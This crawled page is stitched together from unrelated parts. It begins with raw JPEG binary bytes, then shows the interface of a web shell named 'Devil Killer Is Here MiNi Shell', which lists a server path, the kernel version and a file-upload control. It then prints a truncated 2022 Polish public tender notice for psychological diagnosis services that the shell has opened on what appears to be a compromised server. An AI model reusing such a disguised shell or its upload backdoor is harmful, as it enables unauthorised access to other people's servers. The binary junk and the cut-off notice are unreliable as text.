JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220720/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220720/0026865701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie diagnozy psychologiczno-pedagogicznej dla nowoprzyjętych uczestników stacjonarnych LWK OHP w 2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Lubuska Wojewódzka Komenda Ochotniczych Hufców Pracy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001036632</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zamenhofa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-186</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lwk.zgora@ohp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.lubuska-bip.ohp.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna nadzorowana przez Ministra Rodziny i Polityki Społecznej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie diagnozy psychologiczno-pedagogicznej dla nowoprzyjętych uczestników stacjonarnych LWK OHP w 2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2bc7ffc1-081b-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00268657</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019611/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przeprowadzenie diagnozy psychologiczno-pedagogicznej dla nowoprzyjętych uczestników stacjonarnych LWK OHP w 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/<br/>https://epuap.gov.pl<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie<br/>oświadczeń, wniosków (innych niż dokumenty składane wraz z ofertą), pism i zawiadomień (w tym przesyłanie pism w sprawie<br/>przesłania wyjaśnień treści SWZ) odbywa się wyłącznie za pomocą poczty elektronicznej.<br/>Zamawiający będzie komunikować się z Wykonawcami za pomocą poczty elektronicznej, kierując wszelką korespondencję na email<br/>podany przez Wykonawcę w formularzu ofertowym. Natomiast Wykonawca przesyła korespondencję (w tym wniosek o wyjaśnienie<br/>treści SWZ) do Zamawiającego na adres poczty elektronicznej: k.cyran@ohp.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawcy winni we wszelkich<br/>kontaktach z Zamawiającym powoływać się na znak postępowania: LWK.ZZP.271.21.2022.<br/>Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dn.<br/>30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>Składanie oświadczeń, wniosków (innych niż dokumenty składane wraz z ofertą), pism i zawiadomień (w tym przesyłanie pism w<br/>sprawie przesłania wyjaśnień treści SWZ) odbywa się wyłącznie za pomocą poczty elektronicznej.<br/>Zamawiający będzie komunikować się z Wykonawcami za pomocą poczty elektronicznej, kierując wszelką korespondencję na email<br/>podany przez Wykonawcę w formularzu ofertowym. Natomiast Wykonawca przesyła korespondencję (w tym wniosek o wyjaśnienie<br/>treści SWZ) do Zamawiającego na adres poczty elektronicznej: k.cyran@ohp.pl<br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem wyżej wymienionej poczty elektronicznej jako załączniki.<br/>Wszystkie dokumenty elektroniczne, w tym elektroniczne kopie dokumentów – dotyczące spełniania warunków udziału w<br/>postępowaniu, lub pełnomocnictwa, muszą być opatrzone elektronicznym podpisem kwalifikowanym, podpisem zaufanym lub<br/>podpisem osobistym, pod rygorem ich nieważności.<br/>Pozostała korespondencja (inna niż w zakresie dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub<br/>dokumentów potwierdzających brak podstaw wykluczenia), nie wymaga opatrzenia kwalifikowalnego podpisu elektronicznego.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji.<br/>Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i<br/>na miniPortalu. Cały proces szyfrowania oferty ma miejsce na stronie miniPortalu.<br/>Oferta wraz załącznikami powinna być sporządzona w języku polskim, w formie elektronicznej (czyli podpisana kwalifikowalnym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Ofertę należy<br/>złożyć w oryginale. Zamawiający sugeruje złożenie oferty w formacie .pdf. Zamawiający uzna za dokument elektroniczny ofertę<br/>pierwotnie sporządzoną w postaci papierowej, a następnie przekształconą do postaci elektronicznej np. poprzez jej zeskanowanie.<br/>Informacje stanowiące tajemnicę przedsiębiorstwa powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem<br/>polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi jawną część skompresowane<br/>do jednego pliku archiwum (ZIP).<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu określa Regulamin korzystania z miniPortalu oraz Regulamin ePUAP.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB.<br/>Za datę przekazania wszystkich dokumentów składających się na ofertę przyjmuje się datę ich przekazania na ePUAP i na<br/>miniPortalu. Data ta widoczna będzie na potwierdzeniu UPP. Zamawiający sugeruje zachowanie potwierdzenia UPP w celu ew.<br/>weryfikacji złożenia oferty w terminie.<br/>Zamawiający nie uzna jako oferty pliku, który nie da się otworzyć. Ofertę należy przygotować i składać w sposób określony w<br/>niniejszej SWZ oraz w wymaganiach miniPortalu i e-PUAP. Oferta musi dać się otworzyć w sposób prosty, za pośrednictwem<br/>powszechnie dostępnych na rynku programów.<br/>Więcej informacji w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osób występujących w dokumentacji Wykonawców ubiegających się o udzielenie zamówienia publicznego przez Lubuską Wojewódzką Komendę Ochotniczych Hufców Pracy z<br/>siedzibą przy ul. Zamenhofa 1, 65-186 Zielona Góra, jest Wojewódzki Komendant OHP, e-mail lwk.zgora@ohp.pl.<br/>2. W imieniu Administratora danych sferę przetwarzania danych osobowych nadzoruje Inspektor ochrony danych, z którym można<br/>kontaktować się pod adresem email: iodo.lubuska@ohp.pl.<br/>3. Pana/i dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego nr LWK.ZZP.271.21.2022 prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji.<br/>4. Dane przetwarzane będą w celu:<br/>a) koordynacji, rozstrzygnięcia i udokumentowania wyboru najkorzystniejszej oferty, zgodnie z ustawą z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych, w związku z art. 6 ust. 1 lit. c ogólnego rozporządzenia o ochronie danych osobowych z dnia 27<br/>kwietnia 2016 r. (dalej RODO);<br/>b) prowadzenia korespondencji w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego art. 6 ust. 1 lit. c<br/>RODO;<br/>c) w celu ewentualnego ustalenia, dochodzenia lub obrony przed roszczeniami będącego realizacją prawnie uzasadnionego interesu<br/>art. 6 ust. 1 lit. f RODO.<br/>5. Dane osobowe mogą być udostępniane następującym odbiorcom bądź kategoriom odbiorców:<br/>a) podmiotom uprawnionym do uzyskania danych osobowych na podstawie przepisów prawa (np. NIK, Urząd Zamówień<br/>Publicznych);<br/>b) brokerowi PEF (Platformy Elektronicznego Fakturowania);<br/>c) obsłudze prawnej;<br/>d) operatorom pocztowym;<br/>e) innym oferentom;<br/>f) osobom występującym o udzielenie informacji publicznej.<br/>6. Dane osobowe przechowywane będą zgodnie z obowiązującymi przepisami prawa oraz zgodnie z uzasadnionym interesem<br/>administratora np. przez okres, w którym mogą ujawnić się roszczenia związane z rozstrzygnięciem zamówienia. Dokumentacja dot.<br/>zamówień publicznych jest przechowywana przez 5 lat, z wyjątkiem dokumentacji zamówień publicznych realizowanych w ramach<br/>projektów unijnych, którą administrator przechowuje przez 10 lat. W przypadku wyrażenia zgody na przetwarzanie, dane będą<br/>przetwarzane do czasu wycofania zgody.<br/>7. Posiada Pan/i prawo, z wyjątkami zastrzeżonymi przepisami prawa:<br/>a) żądania od Administratora dostępu do danych osobowych (art. 15 RODO );<br/>b) sprostowania danych (poprawiania) w przypadku gdy dane są nieprawidłowe lub niekompletne (art. 16 RODO);<br/>c) do żądania usunięcia danych osobowych tzw. „prawo do bycia zapominanym” (art. 17 RODO);<br/>d) żądania ograniczenia przetwarzania danych osobowych (art. 18 RODO).<br/>8. Nie przysługuje Panu/i:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Dodatkowe informacje dotyczące RODO znajdują się w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">LWK.ZZP.271.21.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie diagnozy psychologiczno-pedagogicznej dla nowoprzyjętych uczestników stacjonarnych w OSiW w Strzelcach Krajeńskich i OSiW w Międzyrzeczu<br/><br/>Orientacyjna liczba nowoprzyjętych uczestników w poszczególnych Ośrodkach:<br/> Ośrodku Szkolenia i Wychowania w Strzelcach Krajeńskich - 25 osób <br/>(+/- 20%), <br/>w Ośrodku Szkolenia i Wychowania w Międzyrzeczu - 20 osób (+/- 20%)<br/><br/>Szczegółowy opis znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">98 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty w każdej z części postępowania, Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>Cena brutto zadania (C) –60%<br/>Doświadczenie zawodowe osób przeprowadzających diagnozę (D) – 40%<br/><br/>Ocena kryterium „C” zostanie dokonana na podstawie informacji zamieszczonej w Formularzu „Oferta” przy zastosowaniu wzoru:<br/><br/>C = Cmin / Cof x 60 <br/><br/>gdzie:<br/>Cmin – najniższa cena brutto spośród ocenianych ofert,<br/>Cof – cena brutto badanej ofercie<br/><br/>Ocena kryterium Doświadczenie zawodowe osób przeprowadzających diagnozę „D” zostanie dokonana na podstawie zadeklarowanego przez Wykonawcę w Karcie oceny ofert (załącznik nr 2.2.) doświadczenia zawodowego osób przeprowadzających diagnozę:<br/><br/>Pełne lata doświadczenia zawodowego osoby/osób przeprowadzających diagnozę	Ilość otrzymanych punktów<br/>1 rok	0,00 pkt.<br/>2-3 lata	20,00 pkt.<br/>4-5 lata	30,00 pkt.<br/>6 lat i więcej 40,00 pkt.<br/><br/>W przypadku gdy w Karcie oceny ofert będzie wskazana jedna osoba, która będzie realizować zadanie w danej części postępowania (przeprowadzać diagnozę), punkty zostaną przyznane wg powyższej tabeli.<br/>W przypadku wskazania do realizacji zadania w danej części postępowania więcej niż jednej osoby, przy ocenie doświadczenia zawodowego Zamawiający weźmie pod uwagę średnią arytmetyczną doświadczenia wszystkich wskazanych osób i przyzna punkty na podstawie średniej liczby lat doświadczenia.<br/>Wykonawca może otrzymać w tym kryterium maksymalnie 40,00 pkt.<br/>W przypadku braku Karty oceny ofert lub braku wskazania w Karcie oceny ofert osoby/osób, które będą realizować zadanie w danej części postępowania, Karta oceny ofert nie będzie podlegać uzupełnieniu, a Wykonawca otrzyma w tym kryterium 0,00 pkt.<br/>W przypadku wskazania osoby posiadającej mniejsze niż wymagane roczne doświadczenie zawodowe, oferta będzie podlegała odrzuceniu, ze względu na niespełnienie warunku udziału w postępowaniu.<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Karcie oceny ofert doświadczenia osób które będą realizować zadanie w danej części postępowania, informacje te nie będą podlegały uzupełnieniu, a Zamawiający uzna, iż wskazana osoba posiada wymagane roczne doświadczenie zawodowe i przyzna w tym kryterium oceny ofert 0,00 pkt.<br/><br/>Ostateczna ocena każdej oferty zostanie dokonana z dokładnością do dwóch miejsc po przecinku z zachowaniem zasady zaokrągleń matematycznych, na podstawie wzoru:<br/>OC = C + D <br/><br/>Ocenie będą podlegały wyłącznie oferty niepodlegające odrzuceniu.<br/>Za najkorzystniejszą w danej części postępowania zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w SWZ warunki oraz uzyska największą liczbę punktów w oparciu o podane kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osób przeprowadzających diagnozę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie diagnozy psychologiczno-pedagogicznej dla nowoprzyjętych uczestników stacjonarnych w OSiW w Nowej Soli<br/><br/>Orientacyjna liczba nowoprzyjętych uczestników w poszczególnych Ośrodkach:<br/> w Ośrodku Szkolenia i Wychowania w Nowej Soli - 10 osób (+/- 20%)<br/><br/>Szczegółowy opis znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">98 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty w każdej z części postępowania, Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>Cena brutto zadania (C) –60%<br/>Doświadczenie zawodowe osób przeprowadzających diagnozę (D) – 40%<br/><br/>Ocena kryterium „C” zostanie dokonana na podstawie informacji zamieszczonej w Formularzu „Oferta” przy zastosowaniu wzoru:<br/><br/>C = Cmin / Cof x 60 <br/><br/>gdzie:<br/>Cmin – najniższa cena brutto spośród ocenianych ofert,<br/>Cof – cena brutto badanej ofercie<br/><br/>Ocena kryterium Doświadczenie zawodowe osób przeprowadzających diagnozę „D” zostanie dokonana na podstawie zadeklarowanego przez Wykonawcę w Karcie oceny ofert (załącznik nr 2.2.) doświadczenia zawodowego osób przeprowadzających diagnozę:<br/><br/>Pełne lata doświadczenia zawodowego osoby/osób przeprowadzających diagnozę	Ilość otrzymanych punktów<br/>1 rok	0,00 pkt.<br/>2-3 lata	20,00 pkt.<br/>4-5 lata	30,00 pkt.<br/>6 lat i więcej 40,00 pkt.<br/><br/>W przypadku gdy w Karcie oceny ofert będzie wskazana jedna osoba, która będzie realizować zadanie w danej części postępowania (przeprowadzać diagnozę), punkty zostaną przyznane wg powyższej tabeli.<br/>W przypadku wskazania do realizacji zadania w danej części postępowania więcej niż jednej osoby, przy ocenie doświadczenia zawodowego Zamawiający weźmie pod uwagę średnią arytmetyczną doświadczenia wszystkich wskazanych osób i przyzna punkty na podstawie średniej liczby lat doświadczenia.<br/>Wykonawca może otrzymać w tym kryterium maksymalnie 40,00 pkt.<br/>W przypadku braku Karty oceny ofert lub braku wskazania w Karcie oceny ofert osoby/osób, które będą realizować zadanie w danej części postępowania, Karta oceny ofert nie będzie podlegać uzupełnieniu, a Wykonawca otrzyma w tym kryterium 0,00 pkt.<br/>W przypadku wskazania osoby posiadającej mniejsze niż wymagane roczne doświadczenie zawodowe, oferta będzie podlegała odrzuceniu, ze względu na niespełnienie warunku udziału w postępowaniu.<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Karcie oceny ofert doświadczenia osób które będą realizować zadanie w danej części postępowania, informacje te nie będą podlegały uzupełnieniu, a Zamawiający uzna, iż wskazana osoba posiada wymagane roczne doświadczenie zawodowe i przyzna w tym kryterium oceny ofert 0,00 pkt.<br/><br/>Ostateczna ocena każdej oferty zostanie dokonana z dokładnością do dwóch miejsc po przecinku z zachowaniem zasady zaokrągleń matematycznych, na podstawie wzoru:<br/>OC = C + D <br/><br/>Ocenie będą podlegały wyłącznie oferty niepodlegające 